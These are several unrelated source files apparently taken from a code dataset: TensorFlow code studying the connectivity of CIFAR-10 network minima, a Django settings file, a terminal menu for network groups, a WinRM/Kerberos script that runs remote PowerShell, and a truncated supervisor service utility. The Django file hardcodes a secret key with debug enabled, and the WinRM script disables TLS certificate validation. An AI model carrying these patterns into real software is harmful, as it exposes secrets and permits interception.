self.biaseslist = [self.biases['b1'],self.biases['b2'],self.biases['out']]
def predict(self, x):
with self.g.as_default():
layer_1 = tf.add(tf.matmul(x, self.weights['h1']), self.biases['b1'])
layer_1 = tf.nn.relu(layer_1)
# Hidden layer with RELU activation
layer_2 = tf.add(tf.matmul(layer_1, self.weights['h2']), self.biases['b2'])
layer_2 = tf.nn.relu(layer_2)
# Output layer with linear activation
out_layer = tf.matmul(layer_2, self.weights['out']) + self.biases['out']
return out_layer
def ReturnParamsAsList(self):
with self.g.as_default():
with tf.Session() as sess:
# Restore variables from disk
self.saver.restore(sess, "/home/dfreeman/PythonFun/tmp/model"+str(self.index)+".ckpt")
return sess.run(self.weightslist), sess.run(self.biaseslist)
class WeightString:
def __init__(self, w1, b1, w2, b2, numbeads, threshold):
self.w1 = w1
self.w2 = w2
self.b1 = b1
self.b2 = b2
#self.w2, self.b2 = m2.params
self.AllBeads = []
self.threshold = threshold
self.AllBeads.append([w1,b1])
for n in xrange(numbeads):
ws,bs = model_interpolate(w1,b1,w2,b2, (n + 1.)/(numbeads+1.))
self.AllBeads.append([ws,bs])
self.AllBeads.append([w2,b2])
self.ConvergedList = [False for f in xrange(len(self.AllBeads))]
self.ConvergedList[0] = True
self.ConvergedList[-1] = True
def SpringNorm(self, order):
totalweights = 0.
totalbiases = 0.
totaltotal = 0.
#Energy between mobile beads
for i,b in enumerate(self.AllBeads):
if i < len(self.AllBeads)-1:
#print "Tallying energy between bead " + str(i) + " and bead " + str(i+1)
subtotalw = 0.
subtotalb = 0.
#for j in xrange(len(b)):
subtotalw += np.linalg.norm(np.subtract(flatten(self.AllBeads[i][0]),flatten(self.AllBeads[i+1][0])),ord=order)#/len(self.beads[0][j])
#for j in xrange(len(b)):
subtotalb += np.linalg.norm(np.subtract(flatten(self.AllBeads[i][1]),flatten(self.AllBeads[i+1][1])),ord=order)#/len(self.beads[0][j])
totalweights+=subtotalw
totalbiases+=subtotalb
totaltotal+=subtotalw + subtotalb
weightdist = np.linalg.norm(np.subtract(flatten(self.AllBeads[0][0]),flatten(self.AllBeads[-1][0])),ord=order)
biasdist = np.linalg.norm(np.subtract(flatten(self.AllBeads[0][1]),flatten(self.AllBeads[-1][1])),ord=order)
totaldist = np.linalg.norm(np.subtract(flatten(self.AllBeads[0]),flatten(self.AllBeads[-1])),ord=order)
return [totalweights,totalbiases,totaltotal, weightdist, biasdist, totaldist]#/len(self.beads)
def SGDBead(self, bead, thresh, maxindex):
finalerror = 0.
#thresh = .05
# Parameters
learning_rate = 0.001
training_epochs = 15
batch_size = 100
display_step = 1
curWeights, curBiases = self.AllBeads[bead]
#test_model = multilayer_perceptron(w=curWeights, b=curBiases)
test_model = convnet(w=curWeights, b=curBiases)
with test_model.g.as_default():
global_step = tf.Variable(0, trainable=False)
# Get images and labels for CIFAR-10.
images, labels = cifar10.distorted_inputs()
test_images, test_labels = cifar10.inputs(eval_data='test')
# Build a Graph that computes the logits predictions from the
# inference model.
logits = test_model.predict(images)
logit_test = test_model.predict(test_images)
# Calculate loss.
loss = cifar10.loss(logits, labels)
# Build a Graph that trains the model with one batch of examples and
# updates the model parameters.
train_op = cifar10.train(loss, global_step)
top_k_op = tf.nn.in_top_k(logit_test, test_labels, 1)
# Build an initialization operation to run below.
init = tf.initialize_all_variables()
# Start running operations on the Graph.
#sess = tf.Session(config=tf.ConfigProto(
# log_device_placement=FLAGS.log_device_placement))
with tf.Session(config=tf.ConfigProto(
log_device_placement=False)) as sess:
sess.run(init)
tf.train.start_queue_runners(sess=sess)
step = 0
stopcond = True
while step < max_steps and stopcond:
start_time = time.time()
_, loss_value = sess.run([train_op, loss])
duration = time.time() - start_time
assert not np.isnan(loss_value), 'Model diverged with loss = NaN'
if step % 10 == 0:
num_examples_per_step = batch_size
examples_per_sec = num_examples_per_step / duration
sec_per_batch = float(duration)
format_str = ('%s: step %d, loss = %.2f (%.1f examples/sec; %.3f '
'sec/batch)')
print (format_str % (datetime.now(), step, loss_value,
examples_per_sec, sec_per_batch))
if step % 100 == 0:
num_iter = int(math.ceil(num_examples / batch_size))
true_count = 0 # Counts the number of correct predictions.
total_sample_count = num_iter * batch_size
stepp = 0
while stepp < num_iter:
predictions = sess.run([top_k_op])
true_count += np.sum(predictions)
stepp += 1
# Compute precision @ 1.
precision = true_count / total_sample_count
print('%s: precision @ 1 = %.3f' % (datetime.now(), precision))
if precision > 1 - thresh:
stopcond = False
test_model.params = sess.run(test_model.weightslist), sess.run(test_model.biaseslist)
self.AllBeads[bead]=test_model.params
finalerror = 1 - precision
print ("Final bead error: ",str(finalerror))
step += 1
return finalerror
#Model generation
#copy_model = multilayer_perceptron(ind=0)
copy_model = convnet(ind=0)
for ii in xrange(2):
'''weights = {
'h1': tf.Variable(tf.random_normal([n_input, n_hidden_1])),
'h2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),
'out': tf.Variable(tf.random_normal([n_hidden_2, n_classes]))
}
biases = {
'b1': tf.Variable(tf.random_normal([n_hidden_1])),
'b2': tf.Variable(tf.random_normal([n_hidden_2])),
'out': tf.Variable(tf.random_normal([n_classes]))
}'''
# Construct model with different initial weights
#test_model = multilayer_perceptron(ind=ii)
test_model = convnet(ind=ii)
#Construct model with same initial weights
#test_model = copy.copy(copy_model)
#test_model.index = ii
#print test_model.weights
models.append(test_model)
with test_model.g.as_default():
global_step = tf.Variable(0, trainable=False)
# Get images and labels for CIFAR-10.
images, labels = cifar10.distorted_inputs()
test_images, test_labels = cifar10.inputs(eval_data='test')
# Build a Graph that computes the logits predictions from the
# inference model.
logits = test_model.predict(images)
logit_test = test_model.predict(test_images)
# Calculate loss.
loss = cifar10.loss(logits, labels)
# Build a Graph that trains the model with one batch of examples and
# updates the model parameters.
train_op = cifar10.train(loss, global_step)
top_k_op = tf.nn.in_top_k(logit_test, test_labels, 1)
# Build an initialization operation to run below.
init = tf.initialize_all_variables()
# Start running operations on the Graph.
#sess = tf.Session(config=tf.ConfigProto(
# log_device_placement=FLAGS.log_device_placement))
with tf.Session(config=tf.ConfigProto(
log_device_placement=False)) as sess:
sess.run(init)
tf.train.start_queue_runners(sess=sess)
step = 0
stopcond = True
while step < max_steps and stopcond:
start_time = time.time()
_, loss_value = sess.run([train_op, loss])
duration = time.time() - start_time
assert not np.isnan(loss_value), 'Model diverged with loss = NaN'
if step % 10 == 0:
num_examples_per_step = batch_size
examples_per_sec = num_examples_per_step / duration
sec_per_batch = float(duration)
format_str = ('%s: step %d, loss = %.2f (%.1f examples/sec; %.3f '
'sec/batch)')
print (format_str % (datetime.now(), step, loss_value,
examples_per_sec, sec_per_batch))
if step % 100 == 0:
num_iter = int(math.ceil(num_examples / batch_size))
true_count = 0 # Counts the number of correct predictions.
total_sample_count = num_iter * batch_size
stepp = 0
while stepp < num_iter:
predictions = sess.run([top_k_op])
true_count += np.sum(predictions)
stepp += 1
# Compute precision @ 1.
precision = true_count / total_sample_count
print('%s: precision @ 1 = %.3f' % (datetime.now(), precision))
if precision > 1 - thresh:
stopcond = False
test_model.params = sess.run(test_model.weightslist), sess.run(test_model.biaseslist)
step += 1
#Connected components search
    #Used for softening the training criterion. Some fuzz is required due
    #to the gap between training error and test error.
thresh_multiplier = 1.1
results = []
connecteddict = {}
for i1 in xrange(len(models)):
connecteddict[i1] = 'not connected'
test = WeightString(models[0].params[0],models[0].params[1],models[1].params[0],models[1].params[1],1,1)
for i1 in xrange(len(models)):
print i1
for i2 in xrange(len(models)):
if i2 > i1 and ((connecteddict[i1] != connecteddict[i2]) or (connecteddict[i1] == 'not connected' or connecteddict[i2] == 'not connected')) :
#print "slow1?"
#print i1,i2
#print models[0]
#print models[1]
#print models[0].params
#print models[1].params
#test = WeightString(models[i1].params[0],models[i1].params[1],models[i2].params[0],models[i2].params[1],1,1)
training_threshold = thresh
depth = 0
d_max = 10
#Check error between beads
#Alg: for each bead at depth i, SGD until converged.
#For beads with max error along path too large, add another bead between them, repeat
#Keeps track of which indices to check the interpbeaderror between
newindices = [0,1]
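                # Editor's sketch of the refinement loop below: SGD every
                # unconverged bead until its error drops below threshold,
                # measure the max error along each freshly touched segment,
                # stop once all segment errors are small enough, otherwise
                # insert a midpoint bead on each bad segment and repeat.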
while (depth < d_max):
print newindices
#print "slow2?"
#X, y = GenTest(X,y)
counter = 0
for i,c in enumerate(test.ConvergedList):
if c == False:
#print "slow3?"
error = test.SGDBead(i, .98*training_threshold, 20)
#print "slow4?"
#if counter%5000==0:
# print counter
# print error
test.ConvergedList[i] = True
print test.ConvergedList
interperrors = []
interp_bead_indices = []
for b in xrange(len(test.AllBeads)-1):
if b in newindices:
e = InterpBeadError(test.AllBeads[b][0],test.AllBeads[b][1], test.AllBeads[b+1][0], test.AllBeads[b+1][1])
interperrors.append(e)
interp_bead_indices.append(b)
print interperrors
if max([ee[0] for ee in interperrors]) < thresh_multiplier*training_threshold:
depth = 2*d_max
#print test.ConvergedList
#print test.SpringNorm(2)
#print "Done!"
else:
del newindices[:]
#Interperrors stores the maximum error on the path between beads
#shift index to account for added beads
shift = 0
for i, ie in enumerate(interperrors):
if ie[0] > thresh_multiplier*training_threshold:
k = interp_bead_indices[i]
ws,bs = model_interpolate(test.AllBeads[k+shift][0],test.AllBeads[k+shift][1],\
test.AllBeads[k+shift+1][0],test.AllBeads[k+shift+1][1],\
ie[1]/20.)
test.AllBeads.insert(k+shift+1,[ws,bs])
test.ConvergedList.insert(k+shift+1, False)
newindices.append(k+shift+1)
newindices.append(k+shift)
shift+=1
#print test.ConvergedList
#print test.SpringNorm(2)
#print d_max
depth += 1
if depth == 2*d_max:
results.append([i1,i2,test.SpringNorm(2),"Connected"])
if connecteddict[i1] == 'not connected' and connecteddict[i2] == 'not connected':
connecteddict[i1] = i1
connecteddict[i2] = i1
if connecteddict[i1] == 'not connected':
connecteddict[i1] = connecteddict[i2]
else:
if connecteddict[i2] == 'not connected':
connecteddict[i2] = connecteddict[i1]
else:
if connecteddict[i1] != 'not connected' and connecteddict[i2] != 'not connected':
hold = connecteddict[i2]
connecteddict[i2] = connecteddict[i1]
for h in xrange(len(models)):
if connecteddict[h] == hold:
connecteddict[h] = connecteddict[i1]
else:
results.append([i1,i2,test.SpringNorm(2),"Disconnected"])
#print results[-1]
uniquecomps = []
totalcomps = 0
for i in xrange(len(models)):
if not (connecteddict[i] in uniquecomps):
uniquecomps.append(connecteddict[i])
if connecteddict[i] == 'not connected':
totalcomps += 1
#print i,connecteddict[i]
notconoffset = 0
if 'not connected' in uniquecomps:
notconoffset = -1
#with open('DSSCIFAR.' + str(thresh) + '.' + str(num_run) + '.out','w+') as f:
print "Thresh: " + str(thresh) + "\n"
print "Comps: " + str(len(uniquecomps) + notconoffset + totalcomps) + "\n"
connsum = []
for r in results:
if r[3] == "Connected":
connsum.append(r[2])
#print r[2]
print "***\n"
print str(len(test.AllBeads)) + "\n"
print "\t".join([str(s) for s in connsum[0]])
#print np.average(connsum)
#print np.std(connsum)
| mit | -1,522,237,430,314,512,100 | 29.982571 | 144 | 0.615123 | false |
neqelr17/banknotes | banknotes/settings.py | 1 | 3207 | """
Django settings for banknotes project.
Generated by 'django-admin startproject' using Django 1.9.7.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'm@hb1flp0z#d@+#(l=2^ox!(945_4o7(q5$3c2___h18$m=ad5'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'budget.apps.BudgetConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'banknotes.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'banknotes.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
| gpl-3.0 | -6,370,282,057,669,393,000 | 25.286885 | 91 | 0.688806 | false |
berserkerbernhard/Lidskjalv | code/networkmonitor/modules/groups/grouplistmenu.py | 1 | 2968 | import os
import time
import dialog
from modules.sitegrouphosttools import SiteGroupHostTools
from modules.groups.group import Group
from modules.groups.groupform import GroupForm
from modules.groups.groupmenu import GroupMenu
from modules.sitegrouphosttools import get_group_members
class GroupListMenu(SiteGroupHostTools):
def __init__(self):
self.d = dialog.Dialog(dialog="dialog")
self.storage_path = os.path.expanduser("~/LidskjalvData")
self.g = Group()
self.gf = GroupForm()
self.gm = GroupMenu()
self.sght = SiteGroupHostTools()
def show_menu(self, site):
while True:
menu = self.build_menu(site)
sz = os.get_terminal_size()
s = "Select a group or action in site '%s'" % site
code, tag = self.d.menu(s,
title="Site: '%s' - Groups menu" % site,
height=sz.lines - 5,
width=sz.columns - 8,
menu_height=sz.lines - 15,
backtitle="Lidskjalv",
choices=menu)
if code == self.d.OK:
r = self.process_menu(site, tag)
if r is None:
break
else:
break
def build_menu(self, site):
sp = self.storage_path
if not self.g.group_exist(site, 'Cisco Switches'):
self.g.create_group(site,
'Cisco Switches',
"",
int(time.time()),
[])
if not self.g.group_exist(site, 'MAC exempt'):
self.g.create_group(site,
'MAC exempt',
"",
int(time.time()),
[])
if not self.g.group_exist(site, 'Nagios'):
self.g.create_group(site,
'Nagios',
"",
int(time.time()),
[])
listofgroups = self.g.list_of_groups_by_name(site)
menu = []
menu.append(["AG", "Add group"])
menu.append(["Q", "Quit"])
menu.append(["", " "])
for group in listofgroups:
memberslist = get_group_members(sp, site, group)
ml = len(memberslist)
gd = self.g.get_group_description(site, group)
d = "%s Member(s) - %s" % (str(ml).rjust(3), gd)
menu.append([group, d])
return menu
def process_menu(self, site, tag):
if tag == "Q":
return None
if tag == "AG":
self.gf.group_form(site, None)
if tag in self.g.list_of_groups(site):
self.gm.show_menu(site, tag)
return True
| gpl-3.0 | -3,861,360,141,004,099,600 | 36.56962 | 76 | 0.453504 | false |
bielawb/PSConfAsia17-Linux | Scripts/httpsWinRM.py | 1 | 2125 | #!/usr/bin/env python
# coding: utf-8
import getpass
from re import search
from subprocess import Popen, PIPE
from winrm import Session
from sys import exit, argv
if len(argv) < 2 :
    exit('Usage: %s <command>' % argv[0])
polecenie = " ".join(argv[1:])
exitCode = 0
class PowerShellError(Exception):
pass
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def uruchom_ps(polecenie):
sesja = Session(
'https://jumpbox.monad.net:5986',
auth = (None, None),
transport = 'kerberos',
kerberos_delegation = True,
server_cert_validation = 'ignore'
)
try:
wynik = sesja.run_ps(polecenie)
print wynik.std_out
if wynik.status_code > 0:
raise PowerShellError(wynik.std_err)
else:
print "%sPolecenie zwróciło kod 0 %s" % (bcolors.OKGREEN, bcolors.ENDC)
except:
raise
def zaloguj():
login = "%[email protected]" % getpass.getuser()
kinit = Popen(['kinit', login, '-l', '1h', '-f'], stdin = PIPE, stdout = PIPE, stderr = PIPE)
    kinit.stdin.write('%s\n' % getpass.getpass('Enter password: '))
kinit.wait()
try:
uruchom_ps(polecenie)
except PowerShellError as pse:
print "PowerShell zwrócił błąd:\n%s%s%s" % (bcolors.FAIL, pse, bcolors.ENDC)
exitCode = 1
except Exception as e:
print "Wyjątek:\n%s%s%s" % (bcolors.FAIL, e, bcolors.ENDC)
if search('No Kerberos credentials available', e.message):
print "Błąd wskazuje na konieczność zalogowania..."
try:
zaloguj()
uruchom_ps(polecenie)
except Exception as e:
print "%sNie udało się uruchomić polecenia '%s'. Prawdopodobnie podano nieprawidłowe hasło, bądź użytkownik nie ma odpowiednich uprawnień." % (bcolors.FAIL, polecenie)
print "Błąd: %s %s" % (e, bcolors.ENDC)
exitCode = 2
else:
exitCode = 3
finally:
exit(exitCode)
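# Editor's note: example invocation (the PowerShell command is an
# arbitrary illustration):
#   ./httpsWinRM.py Get-Service WinRM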
| mit | 7,049,195,507,617,604,000 | 28.577465 | 179 | 0.603333 | false |
adityagilra/2015_spiking_population_response | ExcInhNetflex.py | 1 | 5096 | # -*- coding: utf-8 -*-
"""
Spiking neural net of LIF/SRM neurons with AI firing
written by Aditya Gilra (c) July 2015.
"""
from brian2 import * # also does 'from pylab import *'
from embedded_consts import *
import random
## Cannot make this network a Class,
## since brian standalone mode wants all Brian objects to be in the same scope.
###### neuronal constants
#nrn_type = 'LIF' # Leaky Integrate-and-Fire
#nrn_type = 'SRM' # Spike Response Model
nrn_type = 'SRM0' # Spike Response Model exact renewal
R = 1.0e8*ohm
tausynE = 100.0*ms # synaptic tau exc->exc
tausyn = 10.0*ms # synaptic tau for all else
tau0 = 20.0*ms # membrane tau
tau0SI = tau0/second
noise = 20.0*mV
uth = 10.0*mV
uth_base = 0.0*mV
refrT = 0.5*ms
###### network constants
C = 100 # Number of incoming connections on each neuron (exc or inh)
fC = fexc # fraction fC incoming connections are exc, rest inhibitory
excC = int(fC*C) # number of exc incoming connections
if nrn_type == "LIF":
I0base = 10.5*mV/R # base current to all neurons at all times
J = 0.8*mV/R*(10*ms/tausynE)
else:
I0base = 0.0*mV/R # base current to all neurons at all times
J = 0.8*mV/R*(10*ms/tausynE)
# exc strength is J (/R as we multiply by R in eqn)
# Critical J (for LIF network with delta synapses) is
# ~ 0.45e-3 V in paper for N = 10000, C = 1000
# Note individual rate fluctuations
# for J = 0.2e-3 V vs J = 0.8e-3 V
# For SRM/SRM0, synaptic filtering but no u integration
# In Ostojic 2014 / Brunel 2000, u integration,
# but no synaptic filtering.
# Both are equivalent if tausyn and membrane tau are same.
# But LIF with synaptic filtering is different
g = 5.0*tausynE/tausyn # if all exc syns have tausynE
#g = 5.0*(tausynE/tausyn)**2 # if only exc->exc syns have tausynE, but exc->inh is tausyn
# -gJ is the inh strength. For exc-inh balance g >~ f/(1-f)=4
# a tausynE/tausyn factor is also needed to compensate tau-s
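# editor's note: with tausynE = 100 ms and tausyn = 10 ms the line above
# gives g = 5.0*10 = 50, i.e. inhibitory weights -g*J are 50x the
# excitatory ones, compensating the 10x longer excitatory kernel.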
# ###########################################
# Brian network creation
# ###########################################
# reset eta acts as a threshold increase
if nrn_type == "LIF": # LIF
model_eqns = """
du/dt = 1/tau0*(-u + (Ibase + KE + K) * R + deltaItimed( t, i )) : volt
Ibase : amp
dKE/dt = -KE/tausynE : amp
dK/dt = -K/tausyn : amp
"""
threshold_eqns = "u>=uth"
reset_eqns = "u=0*mV"
else: # SRM
model_eqns = """
u = (Ibase + KE + K) * R + deltaItimed( t, i ): volt
Ibase : amp
deta/dt = -eta/tau0 : volt
dKE/dt = -KE/tausynE : amp
dK/dt = -K/tausyn : amp
"""
threshold_eqns = "rand()<=1.0/tau0*exp((u-(eta+uth_base))/noise)*tstep"
if nrn_type == "SRM0": # SRM0 (exact renewal process)
reset_eqns = "eta=uth"
else: # usual SRM (approx as quasi-renewal process)
reset_eqns = "eta+=uth"
# the hazard function rho is the firing rate,
# in time dt the probability to fire is rho*dt.
# noise below is only the output noise,
# input spiking noise comes from spiking during the simulation
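# editor's note, restating the escape rate encoded in the threshold
# string above:
#   rho(u) = (1/tau0) * exp((u - (eta + uth_base))/noise)
#   P(spike in one tstep) = rho(u)*tstep
# e.g. at u = eta + uth_base the rate is 1/tau0 = 1/(20 ms) = 50 Hz.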
Nrns = NeuronGroup(Nbig, model_eqns, \
threshold=threshold_eqns,\
reset=reset_eqns,
refractory = refrT)
Nrns.Ibase = I0base # constant input to all inputs
# there is also transient input above
if nrn_type == 'LIF':
Nrns.u = uniform(0.0,uth/volt,size=Nbig)*volt
# for LIF, u is distibuted
else:
Nrns.eta = uth # initially, all SRM neurons are as if just reset
# brain2 code to make, connect and weight the background synapses
con = Synapses(Nrns,Nrns,'''w : amp
useSynE : 1''',\
pre='KE += useSynE*w; K += (1-useSynE)*w')
## Connections from some Exc/Inh neurons to each neuron
random.seed(100) # set seed for reproducibility of simulations
seed(100)
conn_i = []
conn_j = []
for jidx in range(0,Nbig):
## draw excC number of neuron indices out of NmaxExc neurons
preIdxsE = random.sample(range(NEbig),excC)
## draw inhC=C-excC number of neuron indices out of inhibitory neurons
preIdxsI = random.sample(range(NEbig,Nbig),C-excC)
## connect these presynaptically to i-th post-synaptic neuron
## choose the synapses object based on whether post-syn nrn is exc or inh
conn_i += preIdxsE
conn_j += [jidx]*excC
conn_i += preIdxsI
conn_j += [jidx]*(C-excC)
con.connect(conn_i,conn_j)
con.delay = syndelay
con.useSynE['i<NEbig'] = 1.0
con.w['i<NEbig'] = J
con.w['i>=NEbig'] = -g*J
#con.w = -g*J # kind of winner take all, gives switching
| gpl-3.0 | 5,565,042,228,597,522,000 | 39.768 | 89 | 0.562991 | false |
arozumenko/locust | locust/serviceutils/unixserviceutil.py | 1 | 13419 | # Copyright (c) 2014 Artem Rozumenko ([email protected])
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Service util functionality. """
__author__ = 'Mykhailo Makovetskiy - [email protected]'
import os
import sys
from subprocess import Popen, PIPE, STDOUT
from time import sleep
from copy import deepcopy
from configobj import ConfigObj
import locust.serviceutils.baseserviceutil as baseutil
from locust.serviceutils import (SUPERVISORD_CONF_PATH, SUPERVISORD_CONF_EXT,
CONFIG_STORAGE, EXIT_CODE)
from locust.serviceutils.baseserviceutil import ErrMsg as BaseErrMsg
SUPERV_CMD_TMPL = {'add': 'supervisorctl add {name}',
'avail': 'supervisorctl avail',
'remove': 'supervisorctl remove {name}',
'start': 'supervisorctl start {name}',
'stop': 'supervisorctl stop {name}',
'status': 'supervisorctl status {name}',
'restart': 'supervisorctl restart {name}',
'reload': 'supervisorctl reload',
'reread': 'supervisorctl reread',
'update': 'supervisorctl update'}
#pylint: disable=R0903
class ErrMsg(object):
"""Service error messages."""
bad_super_cmd = ('Supervisor application does not contains given '
'command = {cmd}.\n Available command:\n{cmds}\n')
srv_no_installed = ('ERROR: The service {name} is not installed. '
'Run command install before\n')
#pylint: disable=R0921
class UnixServiceUtil(baseutil.BaseServiceUtil):
""" Unix service util class.
Provides functionality that allows to create, monitor and control a
number of any locust processes by supervisor on UNIX-like operating
systems.
Note:
        UnixServiceUtil subclasses can implement the following methods:
            enable(self) - Enable autostart of the locust service at
                supervisor start.
            disable(self) - Disable autostart of the locust service at
                supervisor start.
"""
def __init__(self, runner, name):
"""UnixServiceUtil constructor.
Args:
runner (types.ClassType, types.FunctionType): Object that run
mainloop cycle of an service.
name (str): Name of a service in supervisor.
"""
super(UnixServiceUtil, self).__init__(runner, name)
self.cmds = dict((k, v.format(name=name)) for k, v
in SUPERV_CMD_TMPL.items())
self.super_conf_path = SUPERVISORD_CONF_PATH
self.super_conf_ext = SUPERVISORD_CONF_EXT
def _check_supervisord_path(self):
"""Check if Supervisor is installed properly."""
if self.super_conf_path is None:
            sys.stderr.write(('The Supervisord config does not exist or is '
                              'wrong. The Supervisord application is not '
                              'installed or not configured properly.'))
sys.exit(EXIT_CODE)
def _create_supervisord_config(self, **kwargs):
"""Create a locust module supervisor configuration file.
Templates is placed in global CFG_TML object. CFG_TML is
instance of ServiceConfig class from serviceconfig.
Args:
**kwargs: Format template arguments.
"""
self._check_supervisord_path()
self._create_config('supervisord', self.super_conf_path,
self.super_conf_ext, **kwargs)
def _remove_supervisord_conf(self):
"""Remove a locust module supervisor configuration file."""
self._check_supervisord_path()
cfg_file = os.path.join(self.super_conf_path,
self.name + self.super_conf_ext)
self._rm(cfg_file, del_empty_par_dir=False)
def _is_installed(self, stderr=True):
"""Checks if a locust service is installed in supervisor.
Args:
            stderr (bool): Suppress the error message if False.
Returns:
bool: True if a locust service is installed.
"""
echo = self._avail_srv()
installed = True if self.name in echo else False
if not installed and stderr:
sys.stderr.write(ErrMsg.srv_no_installed.format(name=self.name))
return installed
def _runsupervisor_cmd(self, command, stderr=True):
"""Run supervisor shell command.
Args:
command (str): supervisor command.
            stderr (bool): Do not echo the command output if False.
Returns:
str: Supervisor command output.
"""
cmd = str(command)
if cmd not in self.cmds:
commands = '\n'.join(SUPERV_CMD_TMPL.keys())
sys.stderr.write(ErrMsg.bad_super_cmd.format(cmd=cmd,
cmds=commands))
return
try:
            echo = Popen(self.cmds[command].split(' '), stdout=PIPE,
                         stderr=STDOUT)
echo = echo.communicate()[0]
except OSError as err:
msg = ('ERROR: During run command - {cmd} shell returns error '
'- {err}.\n')
sys.stderr.write(msg.format(cmd=command, err=str(err.message)))
sys.exit(EXIT_CODE)
if stderr:
sys.stdout.write(str(echo))
return echo
    def _avail_srv(self):
        """Return available supervisor processes.
Returns:
str: Supervisor available command output.
"""
return self._runsupervisor_cmd('avail', stderr=False)
    def _add_srv(self):
        """Add a process to the supervisor.
Returns:
str: Supervisor add command output.
"""
return self._runsupervisor_cmd('add')
    def _reread(self):
        """Update configs of all processes controlled by supervisor.
        Configs update without a process restart.
Returns:
str: Supervisor reread command output.
"""
return self._runsupervisor_cmd('reread')
def _remove(self):
"""Remove a locust service from supervisor.
Returns:
str: Supervisor remove command output.
"""
return self._runsupervisor_cmd('remove')
    def _reload(self):
        """Restart the supervisord daemon and reload its configuration.
        Returns:
            str: Supervisor reload command output.
"""
return self._runsupervisor_cmd('reload')
def _is_running(self):
"""Checks if a supervisor locust service running.
Returns:
bool: True if service running.
"""
return 'RUNNING' in self._runsupervisor_cmd('status', stderr=False)
def _is_stopped(self):
"""Checks if a supervisor locust service stopped.
Returns:
bool: True if service stopped.
"""
return 'Stopped' in self._runsupervisor_cmd('status', stderr=False)
def service_install(self, **kwargs):
"""Install a locust service into supervisor.
Args:
**kwargs: Format templates arguments.
"""
if self._is_installed(stderr=False):
self.service_remove()
if not os.path.exists(self.key_path):
return "Create a secret key first"
self._create_module_config(**kwargs)
self._create_supervisord_config(**kwargs)
self._reread()
self._add_srv()
self._reload()
    def _update(self):
        """Restart the services whose configuration has changed.
        Unchanged processes are left running.
Returns:
str: Supervisor update command output.
"""
return self._runsupervisor_cmd('update')
def service_stop(self):
"""Stop running locust service.
Returns:
str: Supervisor stop command output.
"""
return self._runsupervisor_cmd('stop')
def service_start(self):
"""Start running locust service.
Returns:
str: Supervisor start command output.
"""
return self._runsupervisor_cmd('start')
def service_restart(self):
"""Restart service without making configuration changes.
It stops, and re-starts all managed applications.
Returns:
str: Supervisor start command output.
"""
return self._runsupervisor_cmd('restart')
def service_status(self):
"""Get status of a installed locust service.
Returns:
str: Supervisor status command output.
"""
return self._runsupervisor_cmd('status')
def service_remove(self):
"""Remove a locust service ."""
if self._is_installed():
if self._is_running():
self.service_stop()
self._remove()
self._remove_supervisord_conf()
self._remove_secure_key()
self._remove_module_conf()
self._reload()
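# Illustrative install lifecycle (sketch only; the runner object, service
# name and kwargs below are hypothetical):
#
#   util = UnixServiceUtil(runner, 'locust_agent')
#   util.service_install(log_out_path='/var/log/locust')  # reread + add + reload
#   util.service_status()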
class LocustService(UnixServiceUtil):
"""The locust agent Unix supervisor service util."""
TIMEOUT_DELTA = 0.5 # second
def __init__(self, runner, name, **kwargs):
"""Constructor.
Args:
runner (types.ClassType, types.FunctionType): Object that run
mainloop cycle of an service.
name (str): Name of a service in supervisor.
kwargs (dict): Install options.
"""
self.install_opt = kwargs or {}
super(LocustService, self).__init__(runner, name)
self.install_opt['service_name'] = self.name
self.install_opt['service_path'] = self.runner_path
# pylint: disable=W0221
def service_install(self, **kwargs):
"""Install a locust module as supervisor service.
Args:
